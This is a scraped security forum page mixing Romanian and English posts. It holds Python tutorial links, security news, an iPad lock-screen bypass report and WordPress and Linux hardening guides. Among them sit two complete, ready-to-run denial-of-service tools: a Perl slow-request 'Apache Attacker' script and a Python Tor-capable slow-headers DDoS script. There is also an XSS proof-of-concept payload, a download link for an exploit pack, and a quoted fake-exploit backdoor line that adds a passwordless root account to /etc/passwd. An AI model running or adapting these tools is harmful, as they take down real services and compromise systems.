Nytro

Python Programming Tutorials Here is all of my Python Programming high quality tutorials! 3:19 Python Programming Tutorial - 1 - Installing Python by thenewboston 293,520 views 2 5:40 Python Programming Tutorial - 2 - Numbers and Math by thenewboston 192,181 views 3 6:25 Python Programming Tutorial - 3 - Variables by thenewboston 152,139 views 4 7:08 Python Programming Tutorial - 4 - Modules and Functions by thenewboston 154,537 views 5 8:25 Python Programming Tutorial - 5 - How to Save Your P... by thenewboston 122,680 views 6 6:23 Python Programming Tutorial - 6 - Strings by thenewboston 104,006 views 7 5:28 Python Programming Tutorial - 7 - More on Strings by thenewboston 86,868 views 8 2:56 Python Programming Tutorial - 8 - Raw Input by thenewboston 89,108 views 9 5:04 Python Programming Tutorial - 9 - Sequences and Lists by thenewboston 82,545 views 10 7:43 Python Programming Tutorial - 10 - Slicing by thenewboston 82,488 views 11 6:43 Python Programming Tutorial - 11 - Editing Sequences by thenewboston 72,190 views 12 6:28 Python Programming Tutorial - 12 - More List Functions by thenewboston 68,699 views 13 4:58 Python Programming Tutorial - 13 - Slicing Lists by thenewboston 55,699 views 14 6:02 Python Programming Tutorial - 14 - Intro to Methods by thenewboston 60,803 views 15 4:15 Python Programming Tutorial - 15 - More Methods by thenewboston 54,476 views 16 3:57 Python Programming Tutorial - 16 - Sort and Tuples by thenewboston 49,275 views 17 6:18 Python Programming Tutorial - 17 - Strings n Stuff by thenewboston 47,952 views 18 5:31 Python Programming Tutorial - 18 - Cool String Methods by thenewboston 50,276 views 19 6:13 Python Programming Tutorial - 19 - Dictionary by thenewboston 54,215 views 20 5:50 Python Programming Tutorial - 20 - If Statement by thenewboston 57,107 views 21 5:05 Python Programming Tutorial - 21 - else and elif by thenewboston 45,434 views 22 4:17 Python Programming Tutorial - 22 - Nesting Statements by thenewboston 41,405 views 23 4:33 Python Programming Tutorial - 23 - Comparison Operators by thenewboston 38,245 views 24 6:15 Python Programming Tutorial - 24 - And and Or by thenewboston 36,982 views 25 5:37 Python Programming Tutorial - 25 - For and While Loops by thenewboston 51,979 views 26 5:45 Python Programming Tutorial - 26 - Infinite Loops an... by thenewboston 42,562 views 27 5:20 Python Programming Tutorial - 27 - Building Functions by thenewboston 47,205 views 28 4:04 Python Programming Tutorial - 28 - Default Parameters by thenewboston 35,939 views 29 5:08 Python Programming Tutorial - 29 - Multiple Parameters by thenewboston 34,582 views 30 6:10 Python Programming Tutorial - 30 - Parameter Types by thenewboston 34,451 views 31 4:22 Python Programming Tutorial - 31 - Tuples as Parameters by thenewboston 29,344 views 32 7:10 Python Programming Tutorial - 32 - Object Oriented P... by thenewboston 63,602 views 33 7:48 Python Programming Tutorial - 33 - Classes and Self by thenewboston 54,274 views 34 4:12 Python Programming Tutorial - 34 - Subclasses Superc... by thenewboston 36,963 views 35 3:16 Python Programming Tutorial - 35 - Overwrite Variabl... by thenewboston 29,873 views 36 3:46 Python Programming Tutorial - 36 - Multiple Parent C... by thenewboston 28,343 views 37 4:17 Python Programming Tutorial - 37 - Constructors by thenewboston 30,597 views 38 6:51 Python Programming Tutorial - 38 - Import Modules by thenewboston 36,160 views 39 4:21 Python Programming Tutorial - 39 - reload Modules by thenewboston 25,267 views 40 5:21 Python Programming Tutorial - 40 - Getting Module Info by thenewboston 28,038 views 41 6:28 Python Programming Tutorial - 41 - Working with Files by thenewboston 38,421 views 42 5:23 Python Programming Tutorial - 42 - Reading and Writing by thenewboston 35,579 views 43 6:11 Python Programming Tutorial - 43 - Writing Lines by thenewboston 50,767 views Youtube: http://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA

All About Python and Unicode March 4, 2007 - 3:39pm - frank Contents A Starting Point Unicode Text in Python Converting Unicode symbols to Python literals Why doesn't "print" work? Codecs From Unicode to binary From binary to Unicode String Operations A wrinkle in {{{\U}}} Bugs in Python 2.0 & 2.1 Python as a "universal recoder" Now the Fun Begins ... Unicode and the Real World Unicode Filenames Microsoft Windows Unix/POSIX/Linux Mac OS/X Unicode and HTML Unicode and XML Unicode and network shares (Samba) Summary Articol: http://boodebr.org/main/python/all-about-python-and-unicode

iPad 2 iOS 5 Lock Screen Bypass Vulnerability + Video Marc Gurman at 9to5Mac has discovered a vulnerability on the iPad that allows for a limited bypass of the device's lockscreen. Anyone with an iPad Smart Cover can gain access to the previously-open app (or the home screen if no app was open). By holding the power button to bring up the ‘Power Off’ screen, closing the smart cover, re-opening it, and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked. If the attacker gets dropped into the home screen, then they'll be able to see the installed apps, but won't be able to open anything. If Safari or Mail (or any other app) was the open when the device was locked, then the attacker would have access to that app. From a locked iPad 2: 1) Lock a password protected iPad 2 2) Hold down power button until iPad 2 reaches turn off slider 3) Close Smart Cover 4) Open Smart Cover 5) Click cancel on the bottom of the screen Video: http://www.youtube.com/watch?v=NLgQ22naQhE This isn’t the first security issue Apple has experienced since rolling out iOS 5. On the brand new iPhone 4S it has been discovered you can use Siri when a device is locked. Even if a passcode is required, Siri doesn’t care and allows you to carry out functions such as sending email and text messages. Protection Against the iPad 2 Lock Screen Bypass: For the time being, iPad 2 users are encouraged to disable the "Smart Cover unlocking" feature found in Settings > General. Sursa: http://thehackernews.com/2011/10/ipad-2-ios-5-lock-screen-bypass.html

Anonymous Hackers Take Down 40 Child Porn Websites Anonymous has taken down more than 40 darknet-based child porn websites over the last week. Details of some of the hacks have been released via pastebin #OpDarknet, including personal details 1500 users of a site named 'Lolita City,' and DDoS tools that target Hidden Wiki and Freedom Hosting - alleged to be two of the biggest darknet sites hosting child porn. News of the Anonymous campaign to actively target anyone hosting child porn sites comes from statements associated with Anonymous on Pastebin and two Anonymous YouTube video channels. AnonNews has yet to issue a press release. The AnonMessage and BecomeAnonymous YouTube channels both posted videos with statements of intent to hunt, skin and kill pedobears everywhere, starting with Freedom Hosting. Sursa: http://thehackernews.com/2011/10/anonymous-hackers-take-down-40-child.html

OpenVAS - Advanced Open Source vulnerability scanner OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.The powerful and comprehensive OpenVAS solution is available as Free Software and maintained on a daily basis. An overview of the vulnerability handling process is: - The reporter reports the vulnerability privately to OpenVAS. - The appropriate component's developers works privately with the reporter to resolve the vulnerability. - A new release of the OpenVAS component concerned is made that includes the fix. The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol (OMP). All intelligence is implemented in the Manager so that it is possible to implement various lean clients that will behave consistently e.g. with regard to filtering or sorting scan results. The Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is centrally stored. Download: http://www.openvas.org/download.html Sursa: OpenVAS - Advanced Open Source vulnerability scanner ~ THN : The Hacker News

XSS Vulnerability in Interactive YouTube API Demo Beta There is a Critical Cross site XSS Vulnerability in Interactive YouTube API Demo Beta, Discovered by various sources. One of the White Hat Hacker "Vansh Sharma" Inform us about this XSS Vulnerability with proof of concept. Proof Of Concept : Open YouTube Data API - Demo Beta Enter script <img src="<img src=search"/onerror=alert("xss")//"> in the keyword area. Press ADD Sursa: XSS Vulnerability in Interactive YouTube API Demo Beta ~ THN : The Hacker News

Bleeding Life 2 Exploit Pack Released Black Hat Academy releases Bleeding Life 2 exploit pack. This is an exploit pack that affects Windows-based web browsers via Adobe and Java. You can read all about it, and download it for yourself. Statistics are kept based on exploit, browser, and OS version. Exploits [+] Adobe - CVE-2008-2992 - CVE-2010-1297 - CVE-2010-2884 - CVE-2010-0188 [+] Java - CVE-2010-0842 - CVE-2010-3552 - Signed Applet Features Advanced Statistical Information Stylish Progress Bars Full User-Friendly Admin Panel Referer Stats Secure Panel - Login/Logout Ability To Set and Save Passwords On Panel Ability To Allow Guest Access - Guest Can Only View Stats Page, Clicking and Other Pages Disabled. Ability To Add and/or Remove Exploits Used Ability To Add Scan4You Credentials For Built-In Scanner Use Ability To Filter Browsers Ability To Filter Operating Systems Attempt To Detect and Filter HTTP Proxies Ability To Blacklist by IP/Range Ability To Import Blacklist On Panel Built In Scanner Ability To Upload Payload From Panel Payload Statistical Information - MD5, Size, SHA1 Ability To Generate iFrame On Panel / Encrypted Ability To Domain Check/Scan On Panel Download: http://www.blackhatacademy.org/releases/bleeding-life-2-download.tgz Sursa: http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html

Apache Server Denial of Service exploit (DDOS) #!/usr/bin/perl -w # Exploit Title: Apache Server Denial of Service exploit (DDOS) # Date: 22/10/2011 # Author: Xen0n # Software Link: http://www.apache.org/dyn/closer.cgi # Version: 2.3.14 and older # Tested on: CentOs #feel free to contact us xenon.sec@gmail.com use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print <<EOTEXT; ooooooo ooooo .oooo. `8888 d8' d8P'`Y8b Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo. `8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b .8PY888. 888ooo888 888 888 888 888 888 888 d8' `888b 888 .o 888 888 `88b d88' 888 888 o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o Welcome to Xen0n Apache Attacker EOTEXT my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $xenon, $method, $ssl, $rand, $tcpto ); my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,); if ($version) { print "Version 1.0\n"; exit; } unless ($host) { print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n"; print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n"; print "\n\temail: xenon.sec@ gmail.com\n"; print "\n"; exit; } unless ($port) { $port = 80; print "Defaulting to port 80.\n"; } unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; } unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } } my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading capabilites found!\n"; print "Xen0n will be slower than normal as a result.\n"; } my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0; srand() if ($cache); if ($shost) { $sendhost = $shost; } else { $sendhost = $host; } if ($xenon) { $method = "POST"; } else { $method = "GET"; } if ($test) { my @times = ( "1", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = $totaltime + $_; } $totaltime = $totaltime / 60; print "Testing $host could take up to $totaltime minutes.\n"; my $delay = 0; my $working = 0; my $sock; if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now just wait...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } } if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. Xen0n closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Xen0n against this target. You can tweak the -tcpto flag down to 1 second but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Attacking $host:$port every $timeout seconds with $connections sockets:\n"; if ($usemultithreading) { domultithreading($connections); } else { doconnections( $connections, $usemultithreading ); } } sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n"; sleep($timeout); } } sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } } __END__ Sursa: Apache HTTP server Denial of service venerability

Pedo Gun - PEW PEW - Anonymous DDOSer #!/usr/bin/python # this assumes you have the socks.py (http://phiral.net/socks.py) # and terminal.py (http://phiral.net/terminal.py). DDoS used to take out Hidden Wiki and # Freedom Hosting sites. Based of Tor Hammer by entropy. Uses SLLLLLLOOOOW HEADERS # Chris H. [redacted to avoid copyright issues] attack import os import re import time import sys import random import math import getopt import socks import string import terminal from threading import Thread global stop_now global term stop_now = False term = terminal.TerminalController() useragents = [ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)", "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0", "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13", "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7" ] class httpPost(Thread): def __init__(self, host, port, tor): Thread.__init__(self) self.host = host self.port = port self.socks = socks.socksocket() self.tor = tor self.running = True def _send_http_post(self, pause=10): global stop_now self.socks.send("GET / HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Connection: keep-alive\r\n" "Keep-Alive: 900\r\n" "Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-" "Accept-Encoding: gzip, deflate, compress" % (self.host, random.choice(useragents))) for i in range(0, 9999): if stop_now: self.running = False break p = "X-"+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+": "+random.choice(string.letters+string.digits) print term.BOL+term.UP+term.CLEAR_EOL+"HEADER: %s" % p+term.NORMAL self.socks.send(p+"\r\n") time.sleep(random.uniform(30, 40)) self.socks.close() def run(self): while self.running: while self.running: try: if self.tor: self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) self.socks.connect((self.host, self.port)) print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL break except Exception, e: if e.args[0] == 106 or e.args[0] == 60: break print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL time.sleep(1) continue while self.running: try: self._send_http_post() except Exception, e: if e.args[0] == 32 or e.args[0] == 104: print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL self.socks = socks.socksocket() break time.sleep(0.1) pass def usage(): print "./ch.py -t <target> [-r <threads> -p <port> -T -h]" print " -t|--target <Hostname|IP>" print " -r|--threads <Number of threads> Defaults to 256" print " -p|--port <Web Server Port> Defaults to 80" print " -h|--help Shows this help\n" print "Eg. ./ch.py -t 192.168.1.100 -r 256\n" def main(argv): try: opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="]) except getopt.GetoptError: usage() sys.exit(-1) global stop_now target = '' threads = 256 tor = False port = 80 for o, a in opts: if o in ("-h", "--help"): usage() sys.exit(0) if o in ("-t", "--target"): target = a elif o in ("-r", "--threads"): threads = int(a) elif o in ("-p", "--port"): port = int(a) if target == '' or int(threads) <= 0: usage() sys.exit(-1) print term.DOWN + term.RED + "/*" + term.NORMAL print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL print term.RED + " * Threads: %d" % (threads) + term.NORMAL print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL rthreads = [] for i in range(threads): t = httpPost(target, port, tor) rthreads.append(t) t.start() while len(rthreads) > 0: try: rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()] except KeyboardInterrupt: print "\nShutting down threads...\n" for t in rthreads: stop_now = True t.running = False if __name__ == "__main__": print "\n/*" print "********" print "*"+term.RED + " To Catch a Predator "+term.NORMAL+"*" print "********" print " */\n" main(sys.argv[1:]) Pastebin: #OpDarkNet - Offical Release: Pedo Gun - PEW PEW - Pastebin.com

Incarcarea wireless a devenit realitate de Radu Eftimie | 21 octombrie 2011 Probabil ca multi sunt de acord cu afirmatia ca nimic nu poate fi mai rau intr-o in care agenda ta este plina decat sa ramai fara baterie la telefonul mobil. Aceasta problema pare sa-si fi gasit deja rezolvarea, gratie tehnologiei Powermat, care asigura incarcarea dispozitivelor mobile on-the-go, scrie Mashable. Tehnologia wireless (fara fir) de incarcare a bateriilor exista din 2009, iar de atunci si pana in prezent compania incearca sa imbunatateasca sistemul. Powermat functioneaza pe principiul transferului de energie prin inductia magnetica. Energia este tranferata de la un emitator integrat in suportul de baza al dispozitivului revolutionar catre un receptor care se ataseaza (prin mufa dedicata) telefonului sau altui gadget care trebuie incarcat. Transferul de energie care se face prin intermediul campului magnetic este intrerupt automat in momentul in care bateria device-ului este incarcata total, pentru a se evita pierderea de energie. In viitor, compania, care acum conlucreaza cu Duracell, General Motors si alte nume mari din mai multe domenii, spune ca sistemul de incarcare wireless va deveni disponibil in aeroporturi, hoteluri, cafenele, birourile companiilor, dar si in fiecare casa. Powermat mai afirma ca tehnologia va deveni dominanta peste 10 ani. Sursa si video: Incarcarea wireless a devenit realitate | Hit.ro

E de la forum, nu stiu ce se poate face, sper sa nu trebuiasca schimbat encodingul tabelelor din baza de date. A zis kwe ca se ocupa cand are timp, il mai stresez eu.

Hosting "profesional": F:\xampp\htdocs...

Bypassing Windows 7 Kernel ASLR Authored by Stefan Le Berre Whitepaper called Bypassing Windows 7 Kernel ASLR. In this paper, the author explains every step to code an exploit with a useful kernel ASLR bypass. Successful exploitation is performed on Windows 7 SP0 / SP1. Download: http://dl.packetstormsecurity.net/papers/bypass/NES-BypassWin7KernelAslr.pdf

Cred ca e fake, cel putin asa spun niste persoane care l-au analizat. Creeaza un cont de root fara parola.

Acel "evil" hex se termina cu: "/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD" Trimite datele unde ziceti voi: send(s, buffer, strlen(buffer), 0) Asta e executat local... execl("/bin/sh", "sh", "-c", evil, 0); Deci cred ca e fake, backdoor, deci nu executati (cel putin NU ca root). Sau scoateti: if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); Desi acesta e posibil sa fie necesar pentru shell. Nu stiu ce fac primele instructiuni, daca am timp si reusesc sa dezasamblez datele din hex, poate imi dau seama daca infecteaza sau nu. Deocamdata nu sunt sigur daca e backdoor sau nu, rulati ca user normal si nu ar trebui sa fie probleme.

10 Steps to Securing Your WordPress Installation Fouad Matin on Sep 16th 2011 with 39 comments Tutorial Details Program: WordPress Version: 3.2.1 Difficulty: Beginner Estimated Completion Time: 20 - 30 minutes WordPress is open source which means that everyone, including hackers with a malicious intent, can scour the source code looking for holes in its security. That is why I'm going to show you some good precautionary steps to take to protect you, your WordPress and most importantly, your users. #1 Remove the Admin Superuser Probably, the easiest thing you could do to protect yourself is start off by changing/removing the admin superuser. Anyone who uses WordPress knows that there is a user called admin with a top-level security clearance, especially hackers. If the username is admin, how hard can it be to crack the password. Create a new administrative account but this time with a different name, and then delete the admin account. In fact, what I would personally recommend is to create an administrative account with a very complex username and password (something like x7duEls91*), store it somewhere, and make another account for you to publish content that has your name that does not have executive powers. The admin account is essentially only needed to manage themes, plugins and other aspects of the site that does not need to be changed at on a daily basis – an editor account would be sufficient. “Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months.” ~Clifford Stoll #2 Chose a Strong Password Regardless of the type of site you are running, you may be at risk for a brute-force attack. In the first step when we deleted the admin username, probably deterred most hackers but there are always those that are very persistent or already know your username. The next step to take is to choose a very difficult password and diverse password. A good way to determine whether or not your password is secure is to enter it into an online password checker like passwordmeter.com or to generate a random password. #3 Secure Your Password Also, I prefer take extra precautions when protecting my blog, installing plugins can add an extra layer of security. There are numerous plugins that can handle passwords and login aspects of WordPress. One plugin that I find very useful is Login LockDown; it records the IP address and timestamp of all failed logins in addition to IP blocking after a certain number of failed logins. This plugin is especially helpful when it comes to defending yourself against a brute force attack – most attackers give up on a site if they are IP banned every 5 minutes while running their brute force program. #4 Always Update WordPress As I said earlier, WordPress is open source, making it an easier target for hackers. Nearly 60 million sites use WordPress, when Automattic pumps out an update, the sooner you update your site, the better because when they make a new update they also post the vulnerabilities that they fixed. Also, it doesn't take long to update your WordPress installation, according to WordPress it takes 5 minutes to complete. #5 Hide WordPress Version Let's say that you forget to update your WordPress installation, or just don't have 5 minutes to spare. Your WordPress version gives hackers a good idea of how they can hack your site, especially if it's out dated. By default, WordPress displays the version, because they want it for metrics to see how many people are using which version, etc… However, this is like putting up a bright red sign on your site telling hackers what to do. If you're using a premium theme, odds are that the developer took the liberty of disabling for you, but it's always better to be sure. Open your functions.php file and drop in this line of code. <?php remove_action('wp_head', 'wp_generator'); ?> #6 Change File Permissions It is very important that you have the proper file permissions to ensure your site's security. I recommend that you restrict your file permissions down to the bare, CHMOD value of 744 which essentially makes it read-only to everyone except you. Just open your FTP program and right click the folder or file and click on “File Permissions”. If it is 777, you are very lucky that you haven't already been hacked. You should change the CHMOD value to 744, only giving the “owner” full access. #7 Whitelist Whitelists allow you to manage who is able to access certain parts of your website. It's like building the Great Wall of China around your admin folder, so that no one, except for you, can access the folder. We do this using the .htaccess file. Navigate to your /wp-admin/ folder, then check if there is already a .htaccess file, if there isn't one, just make one. If there is already one there, I suggest making a backup of it before doing any edits. Please make sure you are in the wp-admin folder, and not the root folder. Paste the following code into the .htaccess file: AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "WordPress Admin Access Control" AuthType Basic <LIMIT GET> order deny,allow deny from all # Whitelist Your IP address allow from xx.xx.xx.xxx # Whitelist Your Office's IP address allow from xx.xx.xx.xxx # Whitelist Your IP address While Your Traveling (Delete When You Come Back Home) allow from xx.xx.xx.xxx </LIMIT> Replace the xx's with your IP address, which you can find out at WhatsMyIP.org. Now every time you are going to be logging in from some where other than the places you added into your .htaccess file, you have to add the new IP address before you can use it. #8 Backup Regardless of the level of security of your WordPress site, it is a good habit to always backup your site. There are many ways to do this. You can take advantage of cron jobs, if you're hosting company provides it, by using this command: DBNAME=DB_NAME DBPASS=DB_PASSWORD DBUSER=DB_USER EMAIL="you@your_email.com" mysqldump --opt -u $DBUSER -p$DBPASS $DBNAME > backup.sql gzip backup.sql DATE=`date +%Y%m%d` ; mv backup.sql.gz $DBNAME-backup-$DATE.sql.gz echo 'BLOG BACKUP:Your Backup is attached' | mutt -a $DBNAME-backup-$DATE.sql.gz $EMAIL -s "MySQL Backup" rm $DBNAME-backup-$DATE.sql.gz Alternatively, you can use VaultPress, a service from Automattic. If you're interested in learning more about VaultPress, then I recommend checking out this tutorial. The easiest way to go is to just log into the admin panel, navigate to Tools and then click on Export. This makes your life easier especially when you need to re-set up your WordPress. #9 Hide Your Plugins Putting a blank index file into your /wp-content/plugins/ folder will hide all of your plugins. Some of you are probably thinking, “Who cares if someone can see my plugins?”. Well, plugins can tell hackers how to hack your site, or at least if it is hackable. As you can see, the plugins are clearly visible to anyone who navigates to the /wp-content/plugins folder. If a hacker sees no security plugins, then they immediately know that this will be an easy job. Adding blank index.html into the plugins folder is like putting a security sign in your lawn, it doesn't matter if you actually have the security system, but as long as the hacker doesn't know, he will be less inclined to try anything. #10 Analyze Server Logs The best security tool, regardless of whichever plugin/software you install, is you. In order to be confident that you are completely protected, you have to take a proactive approach to your website's security. Three times a day I check my server logs and web analytics to see if there is any unusual behavior. You're Set! Sursa: http://wp.tutsplus.com/tutorials/10-steps-to-securing-your-wordpress-installation/

Linux Security Basics Published: Monday, August 31st, 2009 by Sam Kleinman One of the most daunting prospects of administering your own server on a public network is dealing with your server's security. While security threats in a networked world are real and it is always important to be mindful of security issues, protecting against possible attacks is often a matter of exercising basic common sense and adhering to some general best practices. This guide takes a broad overview of common security concerns and provides a number of possible solutions to common security problems. You are encouraged to consider deploying some of these measures to "harden" your server against possible attacks. It's important to remember that all of the solutions we present in this document are targeted at specific kinds of attacks, which themselves may be relevant only in specific configurations. Security solutions need to be tailored to the kind of services that you're providing and the software you're running, and the decision whether or not to deploy a specific security solution is often a matter of personal discretion and cost-benefit analysis. Perhaps most importantly, it should be understood that security is a process, not a product (credit to Bruce Schneier.) There is no "magic bullet" set of guidelines that can be followed to ensure the security of any system. Threats are constantly evolving, so vigilance is required on the part of network administrators to prevent unauthorized access to systems. Contents Keep Systems and Software Up To Date Disable Unused Services Lock Down SSH Limit Root and System Users' Access Use a Firewall to Block Unwanted Traffic Use Denyhosts or Fail2Ban to Prevent Password Attacks Encrypt Sensitive Data Best Practices with Databases Keep Systems and Software Up To Date One of the most significant sources of security vulnerabilities are systems running out of date software with known security holes. Make a point of using your system's package management tools to keep your software up to date; this will greatly assist in avoiding easily preventable security 